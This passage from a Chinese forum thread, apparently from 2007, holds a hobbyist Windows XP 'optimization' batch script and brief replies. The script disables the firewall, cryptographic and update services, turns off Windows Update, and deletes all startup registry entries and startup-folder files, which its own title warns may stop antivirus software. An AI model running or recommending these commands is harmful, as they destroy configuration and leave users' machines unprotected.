rem 脚本正在对 XP ServicePacks 2 进行检测...
"%regedit%" /e "%TEMP%\~svclist.txt" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 4" >NUL
if errorlevel==1 (
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 3" >NUL
if errorlevel==1 (
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 2" >NUL
if errorlevel==1 (
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 1" >NUL
if errorlevel==1 (
SET XPSP2=FALSE
cls
echo 您的操作系统是: Windows XP [未知类型 Service Pack或尚未安装]
goto :NO_XPSP
)
SET XPSP2=FALSE
cls
echo 您的操作系统是: Windows XP [Service Pack 1]
goto :NO_XPSP
)
SET XPSP2=TRUE
cls
echo 您的操作系统是: Windows XP [Service Pack 2]
goto :NO_XPSP
)
SET XPSP2=FALSE
cls
echo 您的操作系统是: Windows XP [Service Pack 3]
goto :NO_XPSP
)
SET XPSP2=FALSE
cls
echo 您的操作系统是: Windows XP [Service Pack 4]
goto :NO_XPSP
:OSXP64
rem 明确的操作系统发现 II
set SYSTEM=xp
rem 脚本正在对 XP ServicePacks 2 进行检测...
"%regedit%" /e "%TEMP%\~svclist.txt" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 2" >NUL
if errorlevel==1 (
type "%TEMP%\~svclist.txt"|"%find%" /i "Service Pack 1" >NUL
if errorlevel==1 (
SET XPSP2=FALSE
cls
echo 实验平台: Windows XP64 [未知类型 Service Pack或尚未安装]
goto NO_XPSP
)
SET XPSP2=FALSE
cls
echo 实验平台: Windows XP64 [Service Pack 1]
goto :NO_XPSP
)
SET XPSP2=TRUE
cls
echo 实验平台: Windows XP64 [Service Pack 2]
goto :NO_XPSP
:NO_XPSP
if exist "%TEMP%\~svclist.txt" del /F /Q "%TEMP%\~svclist.txt"
goto :CONTINUE
pause>nul
cls
:CONTINUE
systeminfo|find "物理内存总量"
echo 系统当前时间: %date% %time%
echo 用户域 : %userdomain%
echo 操作系统内核 : %os%
echo 当前登陆用户 : %username%
echo 本地计算机名 : %computername%
echo 系统目录 : %windir%
echo 命令提示符相关参数 : %prompt%
echo 系统驱动盘符 : %systemdrive%
echo cpu标识信息 : %PROCESSOR_IDENTIFIER%
echo 安装程序指定目录 : %programfiles%
echo dos系统环境变量: %path%
echo 所有用户文件夹目录 : %ALLUSERSPROFILE%
echo 当前登陆用户文件夹 : %userprofile%
echo ===============================================================================
echo 请按任意键返回...
pause>nul
goto :_ControlCenter
:_ServRestore
cls
title 系统服务优化恢复
echo.
echo 正在恢复已经优化的系统服务...
reg import "%root%\ServicesSet.reg.default"
echo 恢复成功!
pause > nul
goto :_ControlCenter
:_ServConfig
echo.
title 系统服务配置
cls
echo.
echo 此项目前只完成了单机服务配置,
echo 敬请关注最新消息,请按下"回车键"继续...
pause>nul
cls
echo.
echo 正在对系统服务进行全面快照,您可能需要
echo 等待一些时间,如果你的机器不理想的话...
"%regedit%" /e "%root%\ServicesSet.reg.default"
"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"
cls
echo 系统服务状态备份完成!
sc config Alerter start= DISABLED
sc config ALG start= DISABLED
sc config AppMgmt start= DISABLED
sc config AudioSrv start= AUTO
sc config BITS start= DISABLED
sc config Browser start= DISABLED
sc config CiSvc start= DISABLED
sc config ClipSrv start= DISABLED
sc config COMSysApp start= DISABLED
sc config CryptSvc start= DISABLED
sc config DcomLaunch start= AUTO
sc config Dhcp start= AUTO
sc config dmadmin start= DISABLED
sc config dmserver start= DISABLED
sc config Dnscache start= DISABLED
sc config ERSvc start= DISABLED
sc config Eventlog start= AUTO
sc config EventSystem start= DEMAND
sc config FastUserSwitchingCompatibility start= DISABLED
sc config helpsvc start= DISABLED
sc config HidServ start= DISABLED
sc config HTTPFilter start= DEMAND
sc config ImapiService start= DISABLED
sc config lanmanserver start= DISABLED
sc config lanmanworkstation start= DISABLED
sc config LmHosts start= DISABLED
sc config Messenger start= DISABLED
sc config MSDTC start= DISABLED
sc config MSIServer start= DEMAND
sc config NetDDE start= DISABLED
sc config NetDDEdsdm start= DISABLED
sc config Netlogon start= DISABLED
sc config Netman start= DEMAND
sc config Nla start= DISABLED
sc config NtLmSsp start= DEMAND
sc config NtmsSvc start= AUTO
sc config ose start= DEMAND
sc config PlugPlay start= AUTO
sc config PolicyAgent start= DISABLED
sc config ProtectedStorage start= DISABLED
sc config RasAuto start= DISABLED
sc config RasMan start= DISABLED
sc config RDSessMgr start= DISABLED
sc config RemoteAccess start= DISABLED
sc config RemoteRegistry start= DISABLED
sc config RpcLocator start= DEMAND
sc config RpcSs start= AUTO
sc config RSVP start= DISABLED
sc config SamSs start= DISABLED
sc config SCardSvr start= DISABLED
sc config Schedule start= DISABLED
sc config seclogon start= DISABLED
sc config SENS start= DISABLED
sc config SharedAccess start= DISABLED
sc config ShellHWDetection start= AUTO
sc config Spooler start= DISABLED
sc config srservice start= DISABLED
sc config SSDPSRV start= DISABLED
sc config stisvc start= DISABLED
sc config SwPrv start= DISABLED
sc config SysmonLog start= DISABLED
sc config TapiSrv start= DISABLED
sc config TermService start= DISABLED
sc config Themes start= AUTO
sc config TlntSvr start= DISABLED
sc config TrkWks start= DISABLED
sc config upnphost start= DISABLED
sc config UPS start= DISABLED
sc config VSS start= DISABLED
sc config W32Time start= DISABLED
sc config WebClient start= DISABLED
sc config winmgmt start= AUTO
sc config WmdmPmSN start= DEMAND
sc config Wmi start= DEMAND
sc config WmiApSrv start= DISABLED
sc config wuauserv start= DISABLED
sc config WZCSVC start= DISABLED
sc config xmlprov start= DEMAND
cls
echo 服务配置完成请按"回车键"返回...
pause>nul
goto :_ControlCenter
:_Optimize
rem 菜单显示延迟
reg add "HKCU\Control Panel\Desktop" /v MenuShowDelay /t reg_sz /d 0 /f
rem 屏蔽窗口最小化时的动画效果
reg add "HKCU\Control Panel\Desktop\WindowMetrics" /v MinAnimate /t reg_sz /d 0 /f
rem 不显示快捷方式字样
rem 不显示快捷方式的小箭头
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile" /v IsShortcut /f
rem 当快捷方式无效时候直接删除
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoResolveSearch /t reg_dword /d 1 /f
rem 使用windows传统文件夹风格
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v WebView /t reg_dword /d 0 /f
rem 记事本与自动换行与状态栏兼得
reg add "HKCU\software\microsoft\notepad" /v StatusBar /t reg_dword /d 00000001 /f
reg add "HKCU\software\microsoft\notepad" /v fWrap /t reg_dword /d 00000001 /f
rem 禁止在开始菜单显示 我的音乐 项
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t reg_dword /d 1 /f
rem 禁止在开始菜单显示 图片收藏 项
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t reg_dword /d 1 /f
rem
rem 生成 屏蔽.reg
echo Windows Registry Editor Version 5.00 > 屏蔽.reg
echo [HKCU\Control Panel\Desktop] >> 屏蔽.reg
echo ;菜单显示延迟 >> 屏蔽.reg
echo "MenuShowDelay"="0" >> 屏蔽.reg
echo [HKCU\Control Panel\Desktop\WindowMetrics] >> 屏蔽.reg
echo ;屏蔽窗口最小化时的动画效果 >> 屏蔽.reg
echo "MinAnimate"="0" >> 屏蔽.reg
echo [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer] >> 屏蔽.reg
echo ;不显示快捷方式字样 >> 屏蔽.reg
echo "link"=hex:00,00,00,00 >> 屏蔽.reg
echo [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced] >> 屏蔽.reg
echo ;不显示最近打开的文档 >> 屏蔽.reg
echo "Start_ShowRecentDocs"=dword:00000000 >> 屏蔽.reg
echo ;不显示控制面板 >> 屏蔽.reg
echo "Start_ShowControlPanel"=dword:00000000 >> 屏蔽.reg
echo ;不显示帮助 >> 屏蔽.reg
echo "Start_ShowHelp"=dword:00000000 >> 屏蔽.reg
echo ;不显示我的电脑 >> 屏蔽.reg
echo "Start_ShowMyComputer"=dword:00000000 >> 屏蔽.reg
echo ;不显示我的文档 >> 屏蔽.reg
echo "Start_ShowMyDocs"=dword:00000000 >> 屏蔽.reg
echo ;不显示我的音乐 >> 屏蔽.reg
echo "Start_ShowMyMusic"=dword:00000000 >> 屏蔽.reg
echo ;不显示我的图片 >> 屏蔽.reg
echo "Start_ShowMyPics"=dword:00000000 >> 屏蔽.reg
echo ;不显示网络连接 >> 屏蔽.reg
echo "Start_ShowNetConn"=dword:00000000 >> 屏蔽.reg
echo ;不显示打印和传真 >> 屏蔽.reg
echo "Start_ShowNetPlaces"=dword:00000000 >> 屏蔽.reg
echo [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> 屏蔽.reg
echo ;禁止使用活动桌面 >> 屏蔽.reg
echo "NoActiveDesktop"=dword:00000001 >> 屏蔽.reg
echo ;不显示最近打开的文档 >> 屏蔽.reg
echo "NoRecentDocsMenu"=dword:00000001 >> 屏蔽.reg
echo ;禁止自动升级 >> 屏蔽.reg
echo "NoWindowsUpdate"=dword:00000001 >> 屏蔽.reg
echo ;禁用开始菜单中的常用的程序 >> 屏蔽.reg
echo "NoStartMenuMFUprogramsList"=dword:00000001 >> 屏蔽.reg
echo ;不显示我的文档-收藏夹 >> 屏蔽.reg
echo "NoFavoritesMenu"=dword:00000001 >> 屏蔽.reg
echo ;屏蔽磁盘不足的警告 >> 屏蔽.reg
echo "NoLowDiskSpaceChecks"=dword:00000001 >> 屏蔽.reg
echo ;关机时候自动清除最近打开的文档 >> 屏蔽.reg
echo "ClearRecentDocsOnExit"=dword:00000001 >> 屏蔽.reg
echo ;不显示我的文档记录 >> 屏蔽.reg
echo "NoRecentDocsHistory"=dword:00000001 >> 屏蔽.reg
echo ;不显示开始菜单中的帮助 >> 屏蔽.reg
echo "NoSMHelp"=dword:00000001 >> 屏蔽.reg
echo ;显示系统托盘的自定义图标,例如输入法 >> 屏蔽.reg
echo "NoToolbarsOnTaskbar"=dword:00000000 >> 屏蔽.reg
echo ;不显示网络邻居 >> 屏蔽.reg
echo "NoNetHood"=dword:00000000 >> 屏蔽.reg
echo ;不显示自定义任务栏 >> 屏蔽.reg
echo "NoToolbarCustomize"=dword:00000000 >> 屏蔽.reg
echo ;禁止在开始菜单显示 网上邻居 项 >> 屏蔽.reg
echo "NoStartMenuNetworkPlaces"=dword:00000001 >> 屏蔽.reg
echo ;禁止在开始菜单显示 图片收藏 项 >> 屏蔽.reg
echo "NoSMMyPictures"=dword:00000001 >> 屏蔽.reg
echo ;禁止在开始菜单显示 我的音乐 项 >> 屏蔽.reg
echo "NoStartMenuMyMusic"=dword:00000001 >> 屏蔽.reg
rem
rem
if not exist "%root%"\屏蔽.reg copy /y 屏蔽.reg "%root%"
regedit.exe /s 屏蔽.reg
if exist "%root%"\屏蔽.reg del /q "%root%"\屏蔽.reg
rem
rem 右键菜单清理
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.AIS\ShellNew /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bfc\ShellNew /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bmp\ShellNew /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.doc\Word.Document.8\ShellNew /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.ppt\PowerPoint.Show.8\ShellNew /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.rar\ShellNew /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.wav\ShellNew /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.xls\Excel.Sheet.8\ShellNew /f
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.zip\ShellNew /f
cls
pause
goto :_ControlCenter
:_CheckDisk
cls
@echo off
rem chkdsk.cmd
title 磁盘检测程序
setlocal
echo.
echo 磁盘检测程序已经启动
set _drive=
set _r=
set _f=
echo 请输入驱动器的盘符,卷标名或者装入点...
set /p _drive=输入驱动盘符:
if "%_drive%" == "" goto _end
echo.
echo 你想修复磁盘上的错误和损坏的坏扇区
echo 并恢复可读取的数据吗?(是/否)...
:_recinp
echo "Y" 即 “是”
echo "N" 即 “否”
set /p _r=(请输入你的选择):
if "%_r%" == "" goto _recinp
if /I "%_r%" == "y" goto _go
if /I "%_r%" == "n" goto _fix
goto _recinp
:_fix
echo.
echo 你想修复磁盘上的错误 (是/否)...
:_fixinp
set /p _f=(请输入你的选择):
if /I "%_f%" == "" goto _fixinp
if /I "%_f%" == "y" goto _go
if /I "%_f%" == "n" goto _go
goto _recinp
:_go
echo.
echo ----------------------------------------------------------------
echo 你已经指明检查的 %_drive% 驱动器/卷
echo.
echo 应用了以下选项:
if /I "%_r%" == "y" goto _pfix
if /I "%_f%" == "y" goto _pfix
goto _nofix
:_pfix
echo - 修复磁盘上的错误
:_nofix
if /I "%_r%" == "y" echo - 修复损坏的坏扇区并恢复可读取的数据 (较慢!)
echo ----------------------------------------------------------------
echo.
echo 启动磁盘检测? (是/否)...
:_startinp
set /p _s=(请输入你的选择):
if /I "%_s%" == "" goto _startinp
if /I "%_s%" == "y" goto _run
if /I "%_s%" == "n" goto _abort
goto _startinp
:_run
if /I "%_f%" == "y" set _param=/f
if /I "%_r%" == "y" set _param=/r
set _param=%_drive% %_param%
echo 正在运行: chkdsk.exe %_param%
chkdsk.exe %_param%
echo.
echo CHKDSK.CMD: 磁盘检测完成...
goto _end
:_abort
echo.
echo CHKDSK.CMD: 终止...
:_end
cls
pause
endlocal
cls
goto :_ControlCenter
:_drive_rascal_software_away
cls
title 流氓软件劫持的相关恢复
echo.
echo 此项"流氓软件劫持恢复"以注册表修复为主.
echo.
echo 正在修复系统,请稍等...
echo.
echo.
rundll32.exe advpack.dll /DelNodeRunDLL32 "%systemroot%\System32"\dacui.dll
rundll32.exe advpack.dll /DelNodeRunDLL32 "%systemroot%\Catroot"\icatalog.mdb
"%regsvr32%" /s setupwbv.dll
"%regsvr32%" /s wininet.dll
"%regsvr32%" /s comcat.dll
"%regsvr32%" /s shdoc401.dll
"%regsvr32%" /s shdoc401.dll /i
"%regsvr32%" /s asctrls.ocx
"%regsvr32%" /s oleaut32.dll
"%regsvr32%" /s shdocvw.dll /I
"%regsvr32%" /s shdocvw.dll
"%regsvr32%" /s browseui.dll
"%regsvr32%" /s browseui.dll /I
"%regsvr32%" /s msrating.dll
"%regsvr32%" /s mlang.dll
"%regsvr32%" /s hlink.dll
"%regsvr32%" /s mshtml.dll
"%regsvr32%" /s mshtmled.dll
"%regsvr32%" /s urlmon.dll
"%regsvr32%" /s plugin.ocx
"%regsvr32%" /s sendmail.dll
"%regsvr32%" /s comctl32.dll /i
"%regsvr32%" /s inetcpl.cpl /i
"%regsvr32%" /s mshtml.dll /i
"%regsvr32%" /s scrobj.dll
"%regsvr32%" /s mmefxe.ocx
"%regsvr32%" /s proctexe.ocx mshta.exe /register
"%regsvr32%" /s corpol.dll
"%regsvr32%" /s jscript.dll
"%regsvr32%" /s msxml.dll
"%regsvr32%" /s imgutil.dll
"%regsvr32%" /s thumbvw.dll
"%regsvr32%" /s cryptext.dll
"%regsvr32%" /s rsabase.dll
"%regsvr32%" /s triedit.dll
"%regsvr32%" /s dhtmled.ocx
"%regsvr32%" /s inseng.dll
"%regsvr32%" /s iesetup.dll /i
"%regsvr32%" /s hmmapi.dll
"%regsvr32%" /s cryptdlg.dll
"%regsvr32%" /s actxprxy.dll
"%regsvr32%" /s dispex.dll
"%regsvr32%" /s occache.dll
"%regsvr32%" /s occache.dll /i
"%regsvr32%" /s iepeers.dll
"%regsvr32%" /s wininet.dll /i
"%regsvr32%" /s urlmon.dll /i
"%regsvr32%" /s digest.dll /i
"%regsvr32%" /s cdfview.dll
"%regsvr32%" /s webcheck.dll
"%regsvr32%" /s mobsync.dll
"%regsvr32%" /s pngfilt.dll
"%regsvr32%" /s licmgr10.dll
"%regsvr32%" /s icmfilter.dll
"%regsvr32%" /s hhctrl.ocx
"%regsvr32%" /s inetcfg.dll
"%regsvr32%" /s trialoc.dll
"%regsvr32%" /s tdc.ocx
"%regsvr32%" /s MSR2C.DLL
"%regsvr32%" /s msident.dll
"%regsvr32%" /s msieftp.dll
"%regsvr32%" /s xmsconf.ocx
"%regsvr32%" /s ils.dll
"%regsvr32%" /s msoeacct.dll
"%regsvr32%" /s wab32.dll
"%regsvr32%" /s wabimp.dll
"%regsvr32%" /s wabfind.dll
"%regsvr32%" /s oemiglib.dll
"%regsvr32%" /s directdb.dll
"%regsvr32%" /s inetcomm.dll
"%regsvr32%" /s msoe.dll
"%regsvr32%" /s oeimport.dll
"%regsvr32%" /s msdxm.ocx
"%regsvr32%" /s dxmasf.dll
"%regsvr32%" /s laprxy.dll
"%regsvr32%" /s l3codecx.ax
"%regsvr32%" /s acelpdec.ax
"%regsvr32%" /s mpg4ds32.ax
"%regsvr32%" /s voxmsdec.ax
"%regsvr32%" /s danim.dll
"%regsvr32%" /s Daxctle.ocx
"%regsvr32%" /s lmrt.dll
"%regsvr32%" /s datime.dll
"%regsvr32%" /s dxtrans.dll
"%regsvr32%" /s dxtmsft.dll
"%regsvr32%" /s vgx.dll
"%regsvr32%" /s WEBPOST.DLL
"%regsvr32%" /s WPWIZDLL.DLL
"%regsvr32%" /s POSTWPP.DLL
"%regsvr32%" /s CRSWPP.DLL
"%regsvr32%" /s FTPWPP.DLL
"%regsvr32%" /s FPWPP.DLL
"%regsvr32%" /s FLUPL.OCX
"%regsvr32%" /s wshom.ocx
"%regsvr32%" /s wshext.dll
"%regsvr32%" /s vbscript.dll
"%regsvr32%" /s scrrun.dll mstinit.exe /setup
"%regsvr32%" /s msnsspc.dll /SspcCreateSspiReg
"%regsvr32%" /s msapsspc.dll /SspcCreateSspiReg
rem 生成文件 IE受篡改的恢复.reg
echo Windows Registry Editor Version 5.00 > IE受篡改的恢复.reg
echo ;IE受篡改的相关注册表恢复 >> IE受篡改的恢复.reg
echo ;申明:以下的修改结果可能并不会另所有人 >> IE受篡改的恢复.reg
echo ;满意,但是以下的都是恢复注册表最初的数据 >> IE受篡改的恢复.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main] >> IE受篡改的恢复.reg
echo ;(系统所有用户)IE标题恢复 >> IE受篡改的恢复.reg
echo "Window Title"="Microsoft Internet Explorer" >> IE受篡改的恢复.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] >> IE受篡改的恢复.reg
echo ;(当前用户)IE标题恢复 >> IE受篡改的恢复.reg
echo "Window Title"="Microsoft Internet Explorer" >> IE受篡改的恢复.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main] >> IE受篡改的恢复.reg
echo ;IE的默认页面被篡改,默认情况下为空,即下面的 about:blank >> IE受篡改的恢复.reg
echo "Default_Page_URL"="about:blank" >> IE受篡改的恢复.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] >> IE受篡改的恢复.reg
echo ;修改了IE浏览器缺省主页,并且锁定设置项,禁止用户更改 >> IE受篡改的恢复.reg
echo "Settings"=dword:00000000 >> IE受篡改的恢复.reg
echo "Links"=dword:00000000 >> IE受篡改的恢复.reg
echo "SecAddSites"=dword:00000000 >> IE受篡改的恢复.reg
echo ;IE右键菜单被修改 >> IE受篡改的恢复.reg
echo [-HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt] >> IE受篡改的恢复.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt] >> IE受篡改的恢复.reg
echo ;IE默认搜索引擎被修改 >> IE受篡改的恢复.reg
echo [-HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search] >> IE受篡改的恢复.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search] >> IE受篡改的恢复.reg
echo "CustomizeSearch"="http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm" >> IE受篡改的恢复.reg
echo [-HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search] >> IE受篡改的恢复.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search] >> IE受篡改的恢复.reg
echo "SearchAssistant"="http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm" >> IE受篡改的恢复.reg
echo "CustomizeSearch"="http://ie.search.msn.com/{SUB_RFC1766}/srchasst/srchcust.htm" >> IE受篡改的恢复.reg
echo ;查看“源文件”菜单被禁用 >> IE受篡改的恢复.reg
echo [-HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions] >> IE受篡改的恢复.reg
echo ;系统启动时弹出对话框 >> IE受篡改的恢复.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon] >> IE受篡改的恢复.reg
echo ;IE默认连接首页被修改 >> IE受篡改的恢复.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main] >> IE受篡改的恢复.reg
echo "Start Page"="about:blank" >> IE受篡改的恢复.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] >> IE受篡改的恢复.reg
echo "Start Page"="about:blank" >> IE受篡改的恢复.reg
echo ;IE中鼠标右键失效 >> IE受篡改的恢复.reg
echo [HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions] >> IE受篡改的恢复.reg
echo "NoBrowserContextMenu"=dword:00000000 >> IE受篡改的恢复.reg
rem 生成 IE受篡改的恢复.reg 文件结束
if not exist "%root%"\IE受篡改的恢复.reg copy /y IE受篡改的恢复.reg "%root%"
regedit.exe /s IE受篡改的恢复.reg
if exist "%root%"\IE受篡改的恢复.reg del /q "%root%"\IE受篡改的恢复.reg
cls
echo 修复完毕!
pause
cls
goto :_ControlCenter
:_CommandLine
cls
title 考拉版命令提示符
echo 考拉版命令提示符
echo.
echo ...想要返回请输入 exit
cmd /k &cd "%systemroot%"
cls
goto :_ControlCenter
:_SartUpItemSpeedUp
cls
title 启动提度--此项可能会关闭你随机启动的杀毒软件等其他安全防护软件
echo.
echo 正在进行系统提速配置....
if exist %programfiles%\Real\RealPlayer\rpau3260.dll regsvr32 /u /s %programfiles%\Real\RealPlayer\rpau3260.dll
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /va /f
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /va /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon.exe /d C:\WINDOWS\system32\ctfmon.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /f
if exist "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\*.*" del "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\*.*" /q /f
if exist "C:\Documents and Settings\Default User\「开始」菜单\程序\启动\*.*" del "C:\Documents and Settings\Default User\「开始」菜单\程序\启动\*.*" /q /f
if exist "%userprofile%\「开始」菜单\程序\启动\*.*" del "%userprofile%\「开始」菜单\程序\启动\*.*" /q /f
reg add "HKCU\Console" /v LoadConIme /t reg_dword /d 1 /f
rem
rem 生成启动提速.reg文件
echo Windows Registry Editor Version 5.00 >启动提速.reg
echo ;启动项 >>启动提速.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders] >>启动提速.reg
echo "Startup"="" >>启动提速.reg
echo ;锁定任务栏 >>启动提速.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >>启动提速.reg
echo "LockTaskbar"=dword:00000001 >>启动提速.reg
echo ;取消开机预读取 >>启动提速.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Memory Management] >>启动提速.reg
echo "EnablePrefetcher"=dword:00000000 >>启动提速.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management] >>启动提速.reg
echo "EnablePrefetcher"=dword:00000000 >>启动提速.reg
rem
rem
if not exist "%root%"\启动提速.reg copy /y 启动提速.reg "%root%"
regedit.exe /s 启动提速.reg
if exist 启动提速.reg del /q 启动提速.reg
pause
cls
goto :_ControlCenter
:_QUIT_
:{
cls
echo 猫 猫
echo 猫猫 猫猫 鄙人尚未学习编程,
echo 猫 猫 猫 猫 请不要用专业的眼光来
echo 猫 猫 猫 猫 猫 猫 评估此脚本的实用性。
echo 猫 猫猫猫猫猫 猫 如果你发现脚本运行
echo 猫 猫 中的Bug(缺陷),欢迎致
echo 猫 猫 电指点,本人定当学以
echo 猫 ▲ ▲ 猫 致用。
echo 猫 猫
echo ---猫 猫 --- 谢谢您支持此脚本!!
echo - -猫- __ V __ -猫--
echo. --- 猫 猫 --- 作者: koala
echo. 猫猫猫猫猫 QQ:13019940
echo.
echo.
echo 咨询平台: http://loveskoala.blogspot.com
echo ________________________________________________________
echo.
echo 我是抱着猫打完这段乱七八糟的东西的.
echo * _ *
echo ________________________________________________________
echo [请按任意键退出]
echo ------------------------------------------------------
echo.
set QUIT =
set /p QUIT=
rem
"%process%" > "%root%"\processlist.txt
type "%root%"\processlist.txt|"%find%" /i "explorer.exe" >NUl
if errorlevel==1 "%process%" -k explorer.exe
cls
goto :_EXIT
:}
:_EXIT
:{
rem 撤消脚本申明的变量
path=%systemroot%\system32;%systemroot%;%systemdrive%\
set SELECT=
set regedit=
set regsvr32=
set find=
set process=
set root=
rem 以为下面相关注册表操作开辟道路rem 以下此项为Win + E方式打开的资源管理器外观优化
regedit /s 老板键+E更改优化.reg
reg import "%root%\environment.reg.default"
cls
@echo off
echo.
echo ▓
echo ▓ ▓ ▓▓▓ ▓▓▓▓ ▓ ▓▓▓▓
echo ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓
echo ▓▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓
echo ▓▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓
echo ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓
echo ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓ ▓
echo ▓▓ ▓ ▓▓▓ ▓▓▓▓ ▓ ▓▓ ▓▓▓▓ ▓
echo.
echo.
echo 专注于 VB / QBasic / Turbo C 2.0 编程
echo 专注于 Registry / c盘病毒的一举一动! (此人喜欢收藏病毒 ~.~)
echo --------------------------------------------------------------------------------
echo 您可以按下任意键退出脚本程序,如果你愿意的话...
pause >nul
goto Get_Out
rem 下面的选项为备用选项
rem if /i "%_EXIT%" == "1" goto :Leave_Off
rem if /i "%_EXIT%" == "2" goto :Get_Out
:}
:Leave_Off
start iexplore.exe http://loveskoala.blogspot.com
start explorer.exe
endlocal
:Get_Out
start explorer.exe
endlocal
|
『生如夏花之绚烂
死若秋叶之静美』 dos做到了 |
|
2007-7-3 20:11 |
|
|
heicai
中级用户
积分 385
发帖 156
注册 2007-1-19
状态 离线
|
『第
4 楼』:
楼上的,你的批处理看起来写的很累人, 佩服一下,但完全与楼主意思无关,离题了。难道是纯广告??
|
|
2007-7-3 21:49 |
|
|
kich
中级用户
积分 397
发帖 168
注册 2006-10-8
状态 离线
|
『第
5 楼』:
这个才是病毒文件:
sxs.exe
|
|
2007-7-9 23:26 |
|
|